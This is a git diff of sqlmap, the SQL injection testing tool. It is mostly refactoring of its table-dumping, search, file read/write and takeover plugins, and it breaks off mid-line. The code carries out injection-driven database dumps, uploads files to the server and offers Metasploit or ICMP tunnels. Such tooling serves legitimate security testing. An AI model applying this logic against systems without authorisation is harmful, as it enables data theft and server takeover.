+104,15 @@ class Entries: if foundData is None: kb.data.cachedColumns = {} - self.getColumns(onlyColNames=True) + self.getColumns(onlyColNames=True, dumpMode=True) else: kb.data.cachedColumns = foundData try: - kb.dumpTable = "%s.%s" % (conf.db, tbl) + if Backend.isDbms(DBMS.INFORMIX): + kb.dumpTable = "%s:%s" % (conf.db, tbl) + else: + kb.dumpTable = "%s.%s" % (conf.db, tbl) if not safeSQLIdentificatorNaming(conf.db) in kb.data.cachedColumns \ or safeSQLIdentificatorNaming(tbl, True) not in \ @@ -134,6 +139,7 @@ class Entries: logger.warn(warnMsg) continue + kb.dumpColumns = colList colNames = colString = ", ".join(column for column in colList) rootQuery = queries[Backend.getIdentifiedDbms()].dump_table @@ -164,11 +170,44 @@ class Entries: if not (isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and kb.injection.data[PAYLOAD.TECHNIQUE.UNION].where == PAYLOAD.WHERE.ORIGINAL): table = "%s.%s" % (conf.db, tbl) - retVal = pivotDumpTable(table, colList, blind=False) + if Backend.isDbms(DBMS.MSSQL): + query = rootQuery.blind.count % table + query = agent.whereQuery(query) - if retVal: - entries, _ = retVal - entries = zip(*[entries[colName] for colName in colList]) + count = inject.getValue(query, blind=False, time=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if isNumPosStrValue(count): + try: + indexRange = getLimitRange(count, plusOne=True) + + for index in indexRange: + row = [] + for column in colList: + query = rootQuery.blind.query3 % (column, column, table, index) + query = agent.whereQuery(query) + value = inject.getValue(query, blind=False, time=False, dump=True) or "" + row.append(value) + + entries.append(row) + + except KeyboardInterrupt: + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warn(warnMsg) + + if not entries and not kb.dumpKeyboardInterrupt: + try: + retVal = pivotDumpTable(table, colList, blind=False) + except KeyboardInterrupt: + retVal = None + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warn(warnMsg) + + if retVal: + entries, _ = retVal + entries = zip(*[entries[colName] for colName in colList]) else: query = rootQuery.inband.query % (colString, conf.db, tbl) elif Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): @@ -176,10 +215,17 @@ class Entries: else: query = rootQuery.inband.query % (colString, conf.db, tbl) - query = whereQuery(query) + query = agent.whereQuery(query) - if not entries and query: - entries = inject.getValue(query, blind=False, time=False, dump=True) + if not entries and query and not kb.dumpKeyboardInterrupt: + try: + entries = inject.getValue(query, blind=False, time=False, dump=True) + except KeyboardInterrupt: + entries = None + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warn(warnMsg) if not isNoneValue(entries): if isinstance(entries, basestring): @@ -202,8 +248,7 @@ class Entries: else: colEntry = unArrayizeValue(entry[index]) if index < len(entry) else u'' - _ = len(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry))) - maxLen = max(len(column), _) + maxLen = max(len(column), len(DUMP_REPLACEMENTS.get(getUnicode(colEntry), getUnicode(colEntry)))) if maxLen > kb.data.dumpedTable[column]["length"]: kb.data.dumpedTable[column]["length"] = maxLen @@ -226,10 +271,12 @@ class Entries: query = rootQuery.blind.count % ("%s.%s" % (conf.db, tbl)) elif Backend.isDbms(DBMS.MAXDB): query = rootQuery.blind.count % tbl + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.count % (conf.db, tbl) else: query = rootQuery.blind.count % (conf.db, tbl) - query = whereQuery(query) + query = agent.whereQuery(query) count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) @@ -264,19 +311,56 @@ class Entries: elif Backend.isDbms(DBMS.MAXDB): table = "%s.%s" % (conf.db, tbl) - retVal = pivotDumpTable(table, colList, count, blind=True) + if Backend.isDbms(DBMS.MSSQL): + try: + indexRange = getLimitRange(count, plusOne=True) - if retVal: - entries, lengths = retVal + for index in indexRange: + for column in colList: + query = rootQuery.blind.query3 % (column, column, table, index) + query = agent.whereQuery(query) + + value = inject.getValue(query, union=False, error=False, dump=True) or "" + + if column not in lengths: + lengths[column] = 0 + + if column not in entries: + entries[column] = BigArray() + + lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)))) + entries[column].append(value) + + except KeyboardInterrupt: + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warn(warnMsg) + + if not entries and not kb.dumpKeyboardInterrupt: + try: + retVal = pivotDumpTable(table, colList, count, blind=True) + except KeyboardInterrupt: + retVal = None + kb.dumpKeyboardInterrupt = True + clearConsoleLine() + warnMsg = "Ctrl+C detected in dumping phase" + logger.warn(warnMsg) + + if retVal: + entries, lengths = retVal else: emptyColumns = [] plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) - indexRange = getLimitRange(count, dump=True, plusOne=plusOne) + indexRange = getLimitRange(count, plusOne=plusOne) if len(colList) < len(indexRange) > CHECK_ZERO_COLUMNS_THRESHOLD: + debugMsg = "checking for empty columns" + logger.debug(infoMsg) + for column in colList: - if inject.getValue("SELECT COUNT(%s) FROM %s" % (column, kb.dumpTable), union=False, error=False) == '0': + if not inject.checkBooleanExpression("(SELECT COUNT(%s) FROM %s)>0" % (column, kb.dumpTable)): emptyColumns.append(column) debugMsg = "column '%s' of table '%s' will not be " % (column, kb.dumpTable) debugMsg += "dumped as it appears to be empty" @@ -293,28 +377,27 @@ class Entries: if column not in entries: entries[column] = BigArray() - if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): + if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), conf.db, conf.tbl, sorted(colList, key=len)[0], index) elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): - query = rootQuery.blind.query % (agent.preprocessField(tbl, column), - tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), - index) + query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl.upper() if not conf.db else ("%s.%s" % (conf.db.upper(), tbl.upper())), index) elif Backend.isDbms(DBMS.SQLITE): query = rootQuery.blind.query % (agent.preprocessField(tbl, column), tbl, index) - elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), tbl) + elif Backend.isDbms(DBMS.INFORMIX): + query = rootQuery.blind.query % (index, agent.preprocessField(tbl, column), conf.db, tbl, sorted(colList, key=len)[0]) - query = whereQuery(query) + query = agent.whereQuery(query) value = NULL if column in emptyColumns else inject.getValue(query, union=False, error=False, dump=True) value = '' if value is None else value - _ = DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)) - lengths[column] = max(lengths[column], len(_)) + lengths[column] = max(lengths[column], len(DUMP_REPLACEMENTS.get(getUnicode(value), getUnicode(value)))) entries[column].append(value) except KeyboardInterrupt: + kb.dumpKeyboardInterrupt = True clearConsoleLine() warnMsg = "Ctrl+C detected in dumping phase" logger.warn(warnMsg) @@ -341,16 +424,17 @@ class Entries: attackDumpedTable() except (IOError, OSError), ex: errMsg = "an error occurred while attacking " - errMsg += "table dump ('%s')" % ex.message + errMsg += "table dump ('%s')" % getSafeExString(ex) logger.critical(errMsg) conf.dumper.dbTableValues(kb.data.dumpedTable) except SqlmapConnectionException, ex: errMsg = "connection exception detected in dumping phase " - errMsg += "('%s')" % ex.message + errMsg += "('%s')" % getSafeExString(ex) logger.critical(errMsg) finally: + kb.dumpColumns = None kb.dumpTable = None def dumpAll(self): @@ -391,9 +475,8 @@ class Entries: def dumpFoundColumn(self, dbs, foundCols, colConsider): message = "do you want to dump entries? [Y/n] " - output = readInput(message, default="Y") - if output and output[0] not in ("y", "Y"): + if not readInput(message, default='Y', boolean=True): return dumpFromDbs = [] @@ -404,14 +487,14 @@ class Entries: message += "[%s]\n" % unsafeSQLIdentificatorNaming(db) message += "[q]uit" - test = readInput(message, default="a") + choice = readInput(message, default='a') - if not test or test in ("a", "A"): + if not choice or choice in ('a', 'A'): dumpFromDbs = dbs.keys() - elif test in ("q", "Q"): + elif choice in ('q', 'Q'): return else: - dumpFromDbs = test.replace(" ", "").split(",") + dumpFromDbs = choice.replace(" ", "").split(',') for db, tblData in dbs.items(): if db not in dumpFromDbs or not tblData: @@ -427,16 +510,16 @@ class Entries: message += "[s]kip\n" message += "[q]uit" - test = readInput(message, default="a") + choice = readInput(message, default='a') - if not test or test in ("a", "A"): + if not choice or choice in ('a', 'A'): dumpFromTbls = tblData - elif test in ("s", "S"): + elif choice in ('s', 'S'): continue - elif test in ("q", "Q"): + elif choice in ('q', 'Q'): return else: - dumpFromTbls = test.replace(" ", "").split(",") + dumpFromTbls = choice.replace(" ", "").split(',') for table, columns in tblData.items(): if table not in dumpFromTbls: @@ -448,7 +531,7 @@ class Entries: if conf.excludeCol: colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] - conf.col = ",".join(colList) + conf.col = ','.join(colList) kb.data.cachedColumns = {} kb.data.dumpedTable = {} @@ -459,9 +542,8 @@ class Entries: def dumpFoundTables(self, tables): message = "do you want to dump tables' entries? [Y/n] " - output = readInput(message, default="Y") - if output and output[0].lower() != "y": + if not readInput(message, default='Y', boolean=True): return dumpFromDbs = [] @@ -472,14 +554,14 @@ class Entries: message += "[%s]\n" % unsafeSQLIdentificatorNaming(db) message += "[q]uit" - test = readInput(message, default="a") + choice = readInput(message, default='a') - if not test or test.lower() == "a": + if not choice or choice.lower() == 'a': dumpFromDbs = tables.keys() - elif test.lower() == "q": + elif choice.lower() == 'q': return else: - dumpFromDbs = test.replace(" ", "").split(",") + dumpFromDbs = choice.replace(" ", "").split(',') for db, tablesList in tables.items(): if db not in dumpFromDbs or not tablesList: @@ -495,16 +577,16 @@ class Entries: message += "[s]kip\n" message += "[q]uit" - test = readInput(message, default="a") + choice = readInput(message, default='a') - if not test or test.lower() == "a": + if not choice or choice.lower() == 'a': dumpFromTbls = tablesList - elif test.lower() == "s": + elif choice.lower() == 's': continue - elif test.lower() == "q": + elif choice.lower() == 'q': return else: - dumpFromTbls = test.replace(" ", "").split(",") + dumpFromTbls = choice.replace(" ", "").split(',') for table in dumpFromTbls: conf.tbl = table diff --git a/plugins/generic/enumeration.py b/plugins/generic/enumeration.py index 23826f7e7..d1dd5509f 100644 --- a/plugins/generic/enumeration.py +++ b/plugins/generic/enumeration.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -31,6 +31,7 @@ class Enumeration(Custom, Databases, Entries, Search, Users): kb.data.banner = None kb.data.hostname = "" kb.data.processChar = None + kb.data.characterSet = None Custom.__init__(self) Databases.__init__(self) diff --git a/plugins/generic/filesystem.py b/plugins/generic/filesystem.py index 0aaae5b83..189e4395b 100644 --- a/plugins/generic/filesystem.py +++ b/plugins/generic/filesystem.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -20,7 +20,6 @@ from lib.core.common import isListLike from lib.core.common import isStackingAvailable from lib.core.common import isTechniqueAvailable from lib.core.common import readInput -from lib.core.common import unArrayizeValue from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger @@ -29,6 +28,7 @@ from lib.core.enums import CHARSET_TYPE from lib.core.enums import EXPECTED from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapUndefinedMethod +from lib.core.settings import UNICODE_ENCODING from lib.request import inject class Filesystem: @@ -53,37 +53,42 @@ class Filesystem: lengthQuery = "SELECT DATALENGTH(%s) FROM %s" % (self.tblField, self.fileTblName) - localFileSize = os.path.getsize(localFile) + try: + localFileSize = os.path.getsize(localFile) + except OSError: + warnMsg = "file '%s' is missing" % localFile + logger.warn(warnMsg) + localFileSize = 0 if fileRead and Backend.isDbms(DBMS.PGSQL): - logger.info("length of read file %s cannot be checked on PostgreSQL" % remoteFile) + logger.info("length of read file '%s' cannot be checked on PostgreSQL" % remoteFile) sameFile = True else: - logger.debug("checking the length of the remote file %s" % remoteFile) + logger.debug("checking the length of the remote file '%s'" % remoteFile) remoteFileSize = inject.getValue(lengthQuery, resumeValue=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) sameFile = None if isNumPosStrValue(remoteFileSize): remoteFileSize = long(remoteFileSize) - localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding()) + localFile = getUnicode(localFile, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING) sameFile = False if localFileSize == remoteFileSize: sameFile = True - infoMsg = "the local file %s and the remote file " % localFile - infoMsg += "%s have the same size (%db)" % (remoteFile, localFileSize) + infoMsg = "the local file '%s' and the remote file " % localFile + infoMsg += "'%s' have the same size (%d B)" % (remoteFile, localFileSize) elif remoteFileSize > localFileSize: - infoMsg = "the remote file %s is larger (%db) than " % (remoteFile, remoteFileSize) - infoMsg += "the local file %s (%db)" % (localFile, localFileSize) + infoMsg = "the remote file '%s' is larger (%d B) than " % (remoteFile, remoteFileSize) + infoMsg += "the local file '%s' (%dB)" % (localFile, localFileSize) else: - infoMsg = "the remote file %s is smaller (%db) than " % (remoteFile, remoteFileSize) - infoMsg += "file %s (%db)" % (localFile, localFileSize) + infoMsg = "the remote file '%s' is smaller (%d B) than " % (remoteFile, remoteFileSize) + infoMsg += "file '%s' (%d B)" % (localFile, localFileSize) logger.info(infoMsg) else: sameFile = False warnMsg = "it looks like the file has not been written (usually " - warnMsg += "occurs if the DBMS process' user has no write " + warnMsg += "occurs if the DBMS process user has no write " warnMsg += "privileges in the destination path)" logger.warn(warnMsg) @@ -115,6 +120,8 @@ class Filesystem: back-end DBMS underlying file system """ + checkFile(fileName) + with open(fileName, "rb") as f: content = f.read() @@ -149,15 +156,15 @@ class Filesystem: return retVal def askCheckWrittenFile(self, localFile, remoteFile, forceCheck=False): - output = None + choice = None if forceCheck is not True: message = "do you want confirmation that the local file '%s' " % localFile message += "has been successfully written on the back-end DBMS " - message += "file system (%s)? [Y/n] " % remoteFile - output = readInput(message, default="Y") + message += "file system ('%s')? [Y/n] " % remoteFile + choice = readInput(message, default='Y', boolean=True) - if forceCheck or (output and output.lower() == "y"): + if forceCheck or choice: return self._checkFileLength(localFile, remoteFile) return True @@ -166,9 +173,8 @@ class Filesystem: message = "do you want confirmation that the remote file '%s' " % remoteFile message += "has been successfully downloaded from the back-end " message += "DBMS file system? [Y/n] " - output = readInput(message, default="Y") - if not output or output in ("y", "Y"): + if readInput(message, default='Y', boolean=True): return self._checkFileLength(localFile, remoteFile, True) return None @@ -198,7 +204,7 @@ class Filesystem: self.checkDbmsOs() - for remoteFile in remoteFiles.split(","): + for remoteFile in remoteFiles.split(','): fileContent = None kb.fileReadMode = True @@ -277,14 +283,14 @@ class Filesystem: if conf.direct or isStackingAvailable(): if isStackingAvailable(): - debugMsg = "going to upload the %s file with " % fileType + debugMsg = "going to upload the file '%s' with " % fileType debugMsg += "stacked query SQL injection technique" logger.debug(debugMsg) written = self.stackedWriteFile(localFile, remoteFile, fileType, forceCheck) self.cleanup(onlyFileTbl=True) elif isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION) and Backend.isDbms(DBMS.MYSQL): - debugMsg = "going to upload the %s file with " % fileType + debugMsg = "going to upload the file '%s' with " % fileType debugMsg += "UNION query SQL injection technique" logger.debug(debugMsg) diff --git a/plugins/generic/fingerprint.py b/plugins/generic/fingerprint.py index 87bfc655c..3147b503a 100644 --- a/plugins/generic/fingerprint.py +++ b/plugins/generic/fingerprint.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -45,12 +45,12 @@ class Fingerprint: msg = "do you want to provide the OS? [(W)indows/(l)inux]" while True: - os = readInput(msg, default="W") + os = readInput(msg, default='W').upper() - if os[0].lower() == "w": + if os == 'W': Backend.setOs(OS.WINDOWS) break - elif os[0].lower() == "l": + elif os == 'L': Backend.setOs(OS.LINUX) break else: diff --git a/plugins/generic/misc.py b/plugins/generic/misc.py index 108c55943..42a666579 100644 --- a/plugins/generic/misc.py +++ b/plugins/generic/misc.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -70,7 +70,7 @@ class Miscellaneous: conf.tmpPath = normalizePath(conf.tmpPath) conf.tmpPath = ntToPosixSlashes(conf.tmpPath) - singleTimeDebugMessage("going to use %s as temporary files directory" % conf.tmpPath) + singleTimeDebugMessage("going to use '%s' as temporary files directory" % conf.tmpPath) hashDBWrite(HASHDB_KEYS.CONF_TMP_PATH, conf.tmpPath) @@ -101,7 +101,7 @@ class Miscellaneous: query = "SELECT %s" % query kb.bannerFp["dbmsVersion"] = unArrayizeValue(inject.getValue(query)) - kb.bannerFp["dbmsVersion"] = (kb.bannerFp["dbmsVersion"] or "").replace(",", "").replace("-", "").replace(" ", "") + kb.bannerFp["dbmsVersion"] = (kb.bannerFp["dbmsVersion"] or "").replace(',', "").replace('-', "").replace(' ', "") def delRemoteFile(self, filename): if not filename: @@ -169,9 +169,8 @@ class Miscellaneous: for udf, inpRet in udfDict.items(): message = "do you want to remove UDF '%s'? [Y/n] " % udf - output = readInput(message, default="Y") - if not output or output in ("y", "Y"): + if readInput(message, default='Y', boolean=True): dropStr = "DROP FUNCTION %s" % udf if Backend.isDbms(DBMS.PGSQL): diff --git a/plugins/generic/search.py b/plugins/generic/search.py index 1a4a5b02b..69f57d3b1 100644 --- a/plugins/generic/search.py +++ b/plugins/generic/search.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -33,8 +33,8 @@ from lib.core.exception import SqlmapUserQuitException from lib.core.settings import CURRENT_DB from lib.core.settings import METADB_SUFFIX from lib.request import inject -from lib.techniques.brute.use import columnExists -from lib.techniques.brute.use import tableExists +from lib.utils.brute import columnExists +from lib.utils.brute import tableExists class Search: """ @@ -47,7 +47,7 @@ class Search: def searchDb(self): foundDbs = [] rootQuery = queries[Backend.getIdentifiedDbms()].search_db - dbList = conf.db.split(",") + dbList = conf.db.split(',') if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: dbCond = rootQuery.inband.condition2 @@ -65,7 +65,7 @@ class Search: infoMsg = "searching database" if dbConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) @@ -98,7 +98,7 @@ class Search: if not values and isInferenceAvailable() and not conf.direct: infoMsg = "fetching number of database" if dbConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(db) logger.info(infoMsg) @@ -113,7 +113,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no database" if dbConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' found" % unsafeSQLIdentificatorNaming(db) logger.warn(warnMsg) @@ -146,18 +146,18 @@ class Search: if bruteForce: message = "do you want to use common table existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: - regex = "|".join(conf.tbl.split(",")) + regex = '|'.join(conf.tbl.split(',')) return tableExists(paths.COMMON_TABLES, regex) foundTbls = {} - tblList = conf.tbl.split(",") + tblList = conf.tbl.split(',') rootQuery = queries[Backend.getIdentifiedDbms()].search_table tblCond = rootQuery.inband.condition dbCond = rootQuery.inband.condition2 @@ -171,18 +171,21 @@ class Search: tbl = tbl.upper() infoMsg = "searching table" - if tblConsider == "1": - infoMsg += "s like" + if tblConsider == '1': + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) - if dbCond and conf.db and conf.db != CURRENT_DB: - _ = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if dbCond and conf.db: + _ = conf.db.split(',') whereDbsQuery = " AND (" + " OR ".join("%s = '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + ")" infoMsg += " for database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(db for db in _)) elif conf.excludeSysDbs: whereDbsQuery = "".join(" AND '%s' != %s" % (unsafeSQLIdentificatorNaming(db), dbCond) for db in self.excludeDbsList) - infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) - logger.info(infoMsg2) + msg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(db for db in self.excludeDbsList)) + logger.info(msg) else: whereDbsQuery = "" @@ -225,7 +228,7 @@ class Search: if len(whereDbsQuery) == 0: infoMsg = "fetching number of databases with table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) logger.info(infoMsg) @@ -236,7 +239,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no databases have table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(tbl) logger.warn(warnMsg) @@ -261,7 +264,7 @@ class Search: if tblConsider == "2": continue else: - for db in conf.db.split(",") if conf.db else (self.getCurrentDb(),): + for db in conf.db.split(',') if conf.db else (self.getCurrentDb(),): db = safeSQLIdentificatorNaming(db) if db not in foundTbls: foundTbls[db] = [] @@ -274,7 +277,7 @@ class Search: infoMsg = "fetching number of table" if tblConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) @@ -288,7 +291,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no table" if tblConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(tbl) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) logger.warn(warnMsg) @@ -342,20 +345,19 @@ class Search: if bruteForce: message = "do you want to use common column existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: regex = '|'.join(conf.col.split(',')) conf.dumper.dbTableColumns(columnExists(paths.COMMON_COLUMNS, regex)) message = "do you want to dump entries? [Y/n] " - output = readInput(message, default="Y") - if output and output[0] not in ("n", "N"): + if readInput(message, default='Y', boolean=True): self.dumpAll() return @@ -367,7 +369,7 @@ class Search: whereTblsQuery = "" infoMsgTbl = "" infoMsgDb = "" - colList = conf.col.split(",") + colList = conf.col.split(',') if conf.excludeCol: colList = [_ for _ in colList if _ not in conf.excludeCol.split(',')] @@ -390,24 +392,27 @@ class Search: infoMsg = "searching column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) foundCols[column] = {} if conf.tbl: - _ = conf.tbl.split(",") + _ = conf.tbl.split(',') whereTblsQuery = " AND (" + " OR ".join("%s = '%s'" % (tblCond, unsafeSQLIdentificatorNaming(tbl)) for tbl in _) + ")" infoMsgTbl = " for table%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(tbl) for tbl in _)) - if conf.db and conf.db != CURRENT_DB: - _ = conf.db.split(",") + if conf.db == CURRENT_DB: + conf.db = self.getCurrentDb() + + if conf.db: + _ = conf.db.split(',') whereDbsQuery = " AND (" + " OR ".join("%s = '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in _) + ")" infoMsgDb = " in database%s '%s'" % ("s" if len(_) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in _)) elif conf.excludeSysDbs: whereDbsQuery = "".join(" AND %s != '%s'" % (dbCond, unsafeSQLIdentificatorNaming(db)) for db in self.excludeDbsList) - infoMsg2 = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) - logger.info(infoMsg2) + msg = "skipping system database%s '%s'" % ("s" if len(self.excludeDbsList) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(db) for db in self.excludeDbsList)) + logger.info(msg) else: infoMsgDb = " across all databases" @@ -428,13 +433,13 @@ class Search: # column(s) provided values = [] - for db in conf.db.split(","): - for tbl in conf.tbl.split(","): + for db in conf.db.split(','): + for tbl in conf.tbl.split(','): values.append([safeSQLIdentificatorNaming(db), safeSQLIdentificatorNaming(tbl, True)]) for db, tbl in filterPairValues(values): db = safeSQLIdentificatorNaming(db) - tbls = tbl.split(",") if not isNoneValue(tbl) else [] + tbls = tbl.split(',') if not isNoneValue(tbl) else [] for tbl in tbls: tbl = safeSQLIdentificatorNaming(tbl, True) @@ -468,7 +473,7 @@ class Search: if not conf.db: infoMsg = "fetching number of databases with tables containing column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) logger.info("%s%s%s" % (infoMsg, infoMsgTbl, infoMsgDb)) @@ -479,7 +484,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no databases have tables containing column" if colConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s'" % unsafeSQLIdentificatorNaming(column) logger.warn("%s%s" % (warnMsg, infoMsgTbl)) @@ -501,7 +506,7 @@ class Search: if db not in foundCols[column]: foundCols[column][db] = [] else: - for db in conf.db.split(",") if conf.db else (self.getCurrentDb(),): + for db in conf.db.split(',') if conf.db else (self.getCurrentDb(),): db = safeSQLIdentificatorNaming(db) if db not in foundCols[column]: foundCols[column][db] = [] @@ -519,7 +524,7 @@ class Search: infoMsg = "fetching number of tables containing column" if colConsider == "1": - infoMsg += "s like" + infoMsg += "s LIKE" infoMsg += " '%s' in database '%s'" % (unsafeSQLIdentificatorNaming(column), unsafeSQLIdentificatorNaming(db)) logger.info(infoMsg) @@ -533,7 +538,7 @@ class Search: if not isNumPosStrValue(count): warnMsg = "no tables contain column" if colConsider == "1": - warnMsg += "s like" + warnMsg += "s LIKE" warnMsg += " '%s' " % unsafeSQLIdentificatorNaming(column) warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming(db) logger.warn(warnMsg) diff --git a/plugins/generic/syntax.py b/plugins/generic/syntax.py index 42a67bd9d..cb24360b6 100644 --- a/plugins/generic/syntax.py +++ b/plugins/generic/syntax.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -22,7 +22,7 @@ class Syntax: retVal = expression if quote: - for item in re.findall(r"'[^']*'+", expression, re.S): + for item in re.findall(r"'[^']*'+", expression): _ = item[1:-1] if _: retVal = retVal.replace(item, escaper(_)) diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py index d3a782fcb..6d3106862 100644 --- a/plugins/generic/takeover.py +++ b/plugins/generic/takeover.py @@ -1,7 +1,7 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/) +Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ @@ -96,20 +96,16 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): msg = "how do you want to establish the tunnel?" msg += "\n[1] TCP: Metasploit Framework (default)" msg += "\n[2] ICMP: icmpsh - ICMP tunneling" - valids = (1, 2) while True: - tunnel = readInput(msg, default=1) + tunnel = readInput(msg, default='1') - if isinstance(tunnel, basestring) and tunnel.isdigit() and int(tunnel) in valids: + if tunnel.isdigit() and int(tunnel) in (1, 2): tunnel = int(tunnel) break - elif isinstance(tunnel, int) and tunnel in valids: - break - else: - warnMsg = "invalid value, valid values are 1 and 2" + warnMsg = "invalid value, valid values are '1' and '2'" logger.warn(warnMsg) else: tunnel = 1 @@ -170,17 +166,14 @@ class Takeover(Abstraction, Metasploit, ICMPsh, Registry, Miscellaneous): msg += "\n[2] Via shellcodeexec (file system way, preferred on 64-bit systems)" while True: - choice = readInput(msg, default=1) + choice = readInput(msg, default='1') - if isinstance(choice, basestring) and choice.isdigit() and int(choice) in (1, 2): + if choice.isdigit() and int(choice) in (1, 2): choice = int(choice) break - elif isinstance(choice, int) and choice in (1, 